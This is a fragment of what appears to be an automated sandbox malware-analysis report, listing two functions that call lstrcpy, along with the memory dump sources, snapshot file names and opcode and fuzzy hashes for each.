                                                    • Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95
                                                    Function 00401510 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                    • Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
                                                    • Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                    • Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94
                                                    Function 02481777 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 02481794
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024817B6
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024817D8
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024817FA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
                                                    • Instruction ID: b7d2c20dfe829a0f8c63cf139b72e119188cef6da57873ab64bd694e6c5a193c
                                                    • Opcode Fuzzy Hash: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
                                                    • Instruction Fuzzy Hash: A611EF74A21B42ABD724BF36D85892BB7F9BF446457044A2F985EC3B40EB74E441CFA0